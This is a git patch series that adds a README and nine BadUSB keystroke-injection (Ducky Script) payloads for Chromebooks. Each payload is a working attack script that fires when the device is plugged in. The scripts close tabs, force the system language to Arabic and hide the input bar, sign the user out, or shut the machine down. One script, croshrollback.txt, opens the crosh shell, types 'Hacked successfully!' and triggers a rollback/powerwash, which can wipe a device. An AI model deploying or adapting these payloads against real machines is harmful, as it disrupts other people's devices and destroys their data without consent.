From e0d8ff6edb75666b875189dd4a93a14f5b5cd5f9 Mon Sep 17 00:00:00 2001
From: httpsisbetter <119723641+httpsisbetter@users.noreply.github.com>
Date: Fri, 26 May 2023 20:48:02 -0700
Subject: [PATCH 1/2] Create README.md
---
BadUSB/chromeOS/README.md | 6 ++++++
1 file changed, 6 insertions(+)
create mode 100644 BadUSB/chromeOS/README.md
diff --git a/BadUSB/chromeOS/README.md b/BadUSB/chromeOS/README.md
new file mode 100644
index 000000000..dbe755a57
--- /dev/null
+++ b/BadUSB/chromeOS/README.md
@@ -0,0 +1,6 @@
+
ABOUT
+
+Alot of the chromeOS scripts I found were actually pretty shit and just transfered from other existing windowsOS and macOS scripts.
+So I made my own and please enjoy.
+
+Please note: this might not work on all chromeOS or chromebook devices and change the script to fit your chromebook, but it should work on most chromebooks out there.
From aa068e8665042132572b301af508a16f359e12df Mon Sep 17 00:00:00 2001
From: httpsisbetter <119723641+httpsisbetter@users.noreply.github.com>
Date: Fri, 26 May 2023 20:48:42 -0700
Subject: [PATCH 2/2] Add files via upload
---
BadUSB/chromeOS/arabic.txt | 51 +++++++++++
BadUSB/chromeOS/brainly.txt | 25 ++++++
BadUSB/chromeOS/closetest.txt | 10 +++
BadUSB/chromeOS/croshrollback.txt | 37 ++++++++
BadUSB/chromeOS/langfuck.txt | 141 ++++++++++++++++++++++++++++++
BadUSB/chromeOS/shutdown.txt | 21 +++++
BadUSB/chromeOS/shutdowninput.txt | 23 +++++
BadUSB/chromeOS/signout.txt | 17 ++++
BadUSB/chromeOS/signoutinput.txt | 15 ++++
9 files changed, 340 insertions(+)
create mode 100644 BadUSB/chromeOS/arabic.txt
create mode 100644 BadUSB/chromeOS/brainly.txt
create mode 100644 BadUSB/chromeOS/closetest.txt
create mode 100644 BadUSB/chromeOS/croshrollback.txt
create mode 100644 BadUSB/chromeOS/langfuck.txt
create mode 100644 BadUSB/chromeOS/shutdown.txt
create mode 100644 BadUSB/chromeOS/shutdowninput.txt
create mode 100644 BadUSB/chromeOS/signout.txt
create mode 100644 BadUSB/chromeOS/signoutinput.txt
diff --git a/BadUSB/chromeOS/arabic.txt b/BadUSB/chromeOS/arabic.txt
new file mode 100644
index 000000000..016cadef4
--- /dev/null
+++ b/BadUSB/chromeOS/arabic.txt
@@ -0,0 +1,51 @@
+REM MADE BY HTTPS / https://github.com/httpsisbetter
+REM Changes language in settings to arabic ( It will still have the language input bar in the bottom )
+REM Requirements: CHROMEOS
+
+CTRL W
+DELAY 100
+CTRL W
+DELAY 100
+CTRL W
+DELAY 100
+TAB
+DELAY 100
+ENTER
+DELAY 500
+STRING add input methods
+DELAY 1000
+ENTER
+
+DELAY 3000
+ENTER
+DELAY 700
+STRING arabic
+DELAY 500
+ENTER
+DELAY 100
+TAB
+DELAY 100
+TAB
+DELAY 100
+ENTER
+DELAY 100
+TAB
+DELAY 100
+TAB
+DELAY 100
+ENTER
+
+DELAY 500
+SHIFT TAB
+DELAY 70
+SHIFT TAB
+DELAY 70
+SHIFT TAB
+DELAY 70
+ENTER
+DELAY 100
+CTRL W
+DELAY 100
+CTRL W
+DELAY 100
+CTRL W
\ No newline at end of file
diff --git a/BadUSB/chromeOS/brainly.txt b/BadUSB/chromeOS/brainly.txt
new file mode 100644
index 000000000..87f5125e2
--- /dev/null
+++ b/BadUSB/chromeOS/brainly.txt
@@ -0,0 +1,25 @@
+REM MADE BY HTTPS / https://github.com/httpsisbetter
+REM Resets brainly.com cookies for you
+REM CHROMEOS
+
+CTRL T
+DELAY 500
+STRING chrome://settings/siteData
+DELAY 500
+ENTER
+DELAY 3000
+TAB
+DELAY 2000
+STRING brainly
+DELAY 1000
+TAB
+DELAY 500
+TAB
+DELAY 500
+TAB
+DELAY 500
+TAB
+DELAY 500
+ENTER
+DELAY 1000
+CTRL W
\ No newline at end of file
diff --git a/BadUSB/chromeOS/closetest.txt b/BadUSB/chromeOS/closetest.txt
new file mode 100644
index 000000000..c2c698731
--- /dev/null
+++ b/BadUSB/chromeOS/closetest.txt
@@ -0,0 +1,10 @@
+REM MADE BY HTTPS / https://github.com/httpsisbetter
+REM Closes all tabs ( Change the amount of CTRL W you want the more the ctrl W the more tabs it closes )
+REM ChromeB
+
+CTRL W
+DELAY 100
+CTRL W
+DELAY 100
+CTRL W
+DELAY 100
\ No newline at end of file
diff --git a/BadUSB/chromeOS/croshrollback.txt b/BadUSB/chromeOS/croshrollback.txt
new file mode 100644
index 000000000..013ca2b1d
--- /dev/null
+++ b/BadUSB/chromeOS/croshrollback.txt
@@ -0,0 +1,37 @@
+REM MADE BY HTTPS / https://github.com/httpsisbetter
+REM Will commit a update rollback/powerwash
+REM Might not work with enterprise enrolled devices
+REM Requirement: CHROMEOS
+
+CTRL W
+DELAY 100
+CTRL W
+DELAY 100
+CTRL W
+DELAY 2000
+TAB
+DELAY 100
+TAB
+DELAY 100
+TAB
+DELAY 100
+ENTER
+DELAY 1000
+STRING chrome-untrusted://crosh
+DELAY 100
+ENTER
+DELAY 3000
+STRING Hacked successfully!
+DELAY 100
+ENTER
+DELAY 2000
+STRING cat > /dev/null << EOF
+ENTER
+DELAY 500
+STRING rollback
+DELAY 1000
+ENTER
+DELAY 1000
+STRING Y
+DELAY 500
+ENTER
\ No newline at end of file
diff --git a/BadUSB/chromeOS/langfuck.txt b/BadUSB/chromeOS/langfuck.txt
new file mode 100644
index 000000000..5da5d4ef8
--- /dev/null
+++ b/BadUSB/chromeOS/langfuck.txt
@@ -0,0 +1,141 @@
+REM MADE BY HTTPS / https://github.com/httpsisbetter
+REM Changes language by going into settings then removing the language changer bar and finally shutting down the computer
+REM Requirements: CHROMEOS
+
+CTRL W
+DELAY 100
+CTRL W
+DELAY 100
+CTRL W
+DELAY 2000
+TAB
+DELAY 100
+ENTER
+DELAY 500
+STRING add input methods
+DELAY 1000
+ENTER
+DELAY 3000
+ENTER
+DELAY 700
+STRING arabic
+DELAY 500
+ENTER
+DELAY 100
+TAB
+DELAY 100
+TAB
+DELAY 100
+ENTER
+DELAY 100
+TAB
+DELAY 100
+TAB
+DELAY 100
+ENTER
+DELAY 500
+SHIFT TAB
+DELAY 70
+SHIFT TAB
+DELAY 70
+SHIFT TAB
+DELAY 70
+ENTER
+DELAY 100
+CTRL W
+DELAY 100
+CTRL W
+DELAY 100
+CTRL W
+
+DELAY 100
+SHIFT TAB
+DELAY 200
+TAB
+DELAY 200
+TAB
+DELAY 200
+ENTER
+DELAY 1000
+TAB
+DELAY 200
+TAB
+DELAY 200
+TAB
+DELAY 200
+TAB
+DELAY 200
+TAB
+DELAY 200
+ENTER
+DELAY 2000
+TAB
+DELAY 200
+TAB
+DELAY 200
+TAB
+DELAY 200
+TAB
+DELAY 200
+TAB
+DELAY 200
+ENTER
+DELAY 1000
+TAB
+DELAY 200
+TAB
+DELAY 200
+ENTER
+DELAY 1500
+TAB
+DELAY 200
+TAB
+DELAY 200
+TAB
+DELAY 200
+TAB
+DELAY 200
+TAB
+DELAY 200
+TAB
+DELAY 200
+TAB
+DELAY 200
+TAB
+DELAY 200
+TAB
+DELAY 200
+TAB
+DELAY 200
+TAB
+DELAY 200
+TAB
+DELAY 200
+TAB
+DELAY 200
+TAB
+DELAY 200
+ENTER
+DELAY 1500
+TAB
+DELAY 200
+ENTER
+DELAY 100
+CTRL W
+DELAY 100
+CTRL W
+DELAY 100
+CTRL W
+DELAY 2000
+
+SHIFT TAB
+DELAY 100
+TAB
+DELAY 100
+ENTER
+DELAY 100
+TAB
+TAB
+TAB
+DELAY 100
+ENTER
\ No newline at end of file
diff --git a/BadUSB/chromeOS/shutdown.txt b/BadUSB/chromeOS/shutdown.txt
new file mode 100644
index 000000000..ce987f6ea
--- /dev/null
+++ b/BadUSB/chromeOS/shutdown.txt
@@ -0,0 +1,21 @@
+REM MADE BY HTTPS / https://github.com/httpsisbetter
+REM Shutdown the computer
+REM Requirements: CHROMEOS
+
+CTRL W
+DELAY 100
+CTRL W
+DELAY 100
+CTRL W
+DELAY 2000
+SHIFT TAB
+DELAY 100
+TAB
+DELAY 100
+ENTER
+DELAY 100
+TAB
+TAB
+TAB
+DELAY 100
+ENTER
\ No newline at end of file
diff --git a/BadUSB/chromeOS/shutdowninput.txt b/BadUSB/chromeOS/shutdowninput.txt
new file mode 100644
index 000000000..356abe17d
--- /dev/null
+++ b/BadUSB/chromeOS/shutdowninput.txt
@@ -0,0 +1,23 @@
+REM MADE BY HTTPS / https://github.com/httpsisbetter
+REM Incase theres a language input changer thing on the bottom of your screen to fuck up shutdown
+REM Requirements: CHROMEOS
+
+CTRL W
+DELAY 100
+CTRL W
+DELAY 100
+CTRL W
+DELAY 2000
+SHIFT TAB
+DELAY 100
+TAB
+DELAY 100
+TAB
+DELAY 100
+ENTER
+DELAY 100
+TAB
+TAB
+TAB
+DELAY 100
+ENTER
\ No newline at end of file
diff --git a/BadUSB/chromeOS/signout.txt b/BadUSB/chromeOS/signout.txt
new file mode 100644
index 000000000..08c9cad27
--- /dev/null
+++ b/BadUSB/chromeOS/signout.txt
@@ -0,0 +1,17 @@
+REM MADE BY HTTPS / https://github.com/httpsisbetter
+REM signs out
+REM Requirements: CHROMEOS
+
+CTRL W
+DELAY 100
+CTRL W
+DELAY 100
+CTRL W
+DELAY 2000
+SHIFT TAB
+DELAY 100
+TAB
+DELAY 100
+ENTER
+DELAY 500
+ENTER
\ No newline at end of file
diff --git a/BadUSB/chromeOS/signoutinput.txt b/BadUSB/chromeOS/signoutinput.txt
new file mode 100644
index 000000000..070c379d7
--- /dev/null
+++ b/BadUSB/chromeOS/signoutinput.txt
@@ -0,0 +1,15 @@
+REM MADE BY HTTPS / https://github.com/httpsisbetter
+REM signs out if theres the language input bar
+REM Requirements: CHROMEOS
+
+CTRL W
+DELAY 100
+CTRL W
+DELAY 100
+CTRL W
+DELAY 2000
+SHIFT TAB
+DELAY 100
+ENTER
+DELAY 500
+ENTER
\ No newline at end of file